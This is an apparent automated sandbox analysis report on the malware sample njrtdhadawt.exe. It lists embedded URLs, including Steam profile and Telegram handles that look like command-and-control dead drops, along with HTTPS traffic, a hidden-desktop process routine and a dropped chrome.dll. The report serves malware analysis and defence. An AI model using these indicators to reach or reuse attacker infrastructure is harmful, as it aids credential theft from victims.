                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=ImL_uti9QFBw&amp
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
                            Source: 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=0y-Qdz9keFm
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/toolti
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
                            Source: njrtdhadawt.exe, chrome.dll.0.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://help.steampowered.com/en/
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                            Source: 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/Y
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/discussions/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                            Source: njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%d-
                            Source: 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199794498376
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/market/
                            Source: njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                            Source: njrtdhadawt.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199794498376
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199794498376)
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199794498376/badges
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199794498376/inventory/
                            Source: njrtdhadawt.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199794498376idr7ffMozilla/5.0
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://steamcommunity.com/workshop/
                            Source: 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                            Source: 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/about/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/explore/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/legal/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/mobile
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/news/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/points/shop/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/stats/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000003.1539350071.0000000003A07000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://t.me/a
                            Source: njrtdhadawt.exeString found in binary or memory: https://t.me/asg7rd
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/asg7rdU_
                            Source: njrtdhadawt.exeString found in binary or memory: https://t.me/asg7rdidr7ffsqlo.dllMozilla/5.0
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/nj
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/zj
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/img/t_logo_2x.png
                            Source: njrtdhadawt.exe, 00000000.00000003.1510994054.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                            Source: njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                            Source: njrtdhadawt.exe, 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmp, njrtdhadawt.exe, 00000000.00000002.1551342830.00000000039B3000.00000004.00000020.00020000.00000000.sdmp, 76561199794498376[1].htm.0.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                            Source: njrtdhadawt.exe, 00000000.00000002.1551342830.0000000003998000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, njrtdhadawt.exe, 00000000.00000003.1539387427.00000000039C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                            Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49735 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.7:49741 version: TLS 1.2
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FE829D _memset,wsprintfA,OpenDesktopA,CreateDesktopA,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,lstrcpyA,_memset,CreateProcessA,Sleep,CloseDesktop,0_2_00FE829D

                            System Summary

                            barindex
                            PE file has a writeable .text section
                            Source: njrtdhadawt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FE144B GetCurrentProcess,NtQueryInformationProcess,0_2_00FE144B
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD50DE0 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,0_2_6CD50DE0
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_0100D0010_2_0100D001
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FFB1940_2_00FFB194
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_0100D3D30_2_0100D3D3
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_0100CC630_2_0100CC63
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FFBEF40_2_00FFBEF4
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_0100D7BB0_2_0100D7BB
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_0100C7CE0_2_0100C7CE
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_00FF8F8C0_2_00FF8F8C
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD5EC600_2_6CD5EC60
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD4CC110_2_6CD4CC11
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD39DF10_2_6CD39DF1
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD15DB00_2_6CD15DB0
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD3FDA00_2_6CD3FDA0
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD4ED700_2_6CD4ED70
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD2CEB00_2_6CD2CEB0
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD38E000_2_6CD38E00
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD55F200_2_6CD55F20
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD3D8F00_2_6CD3D8F0
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD3F8E00_2_6CD3F8E0
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD388A00_2_6CD388A0
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD5390E0_2_6CD5390E
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD58BE00_2_6CD58BE0
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD285E00_2_6CD285E0
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD515E00_2_6CD515E0
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD1257C0_2_6CD1257C
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD5E6800_2_6CD5E680
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD5A7D10_2_6CD5A7D1
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD127E00_2_6CD127E0
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD417580_2_6CD41758
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD2A7000_2_6CD2A700
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD6D7350_2_6CD6D735
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD240D00_2_6CD240D0
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD3F1D00_2_6CD3F1D0
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD161700_2_6CD16170
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD282C00_2_6CD282C0
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD522900_2_6CD52290
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD613D60_2_6CD613D6
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: 0_2_6CD6F3400_2_6CD6F340
                            Source: Joe Sandbox ViewDropped File: C:\ProgramData\chrome.dll 81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: String function: 6CD6FDB0 appears 38 times
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: String function: 6CD61380 appears 33 times
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: String function: 00FE47D9 appears 38 times
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: String function: 6CD5D850 appears 90 times
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: String function: 00FF082C appears 69 times
                            Source: C:\Users\user\Desktop\njrtdhadawt.exeCode function: String function: 00FF070A appears 36 times
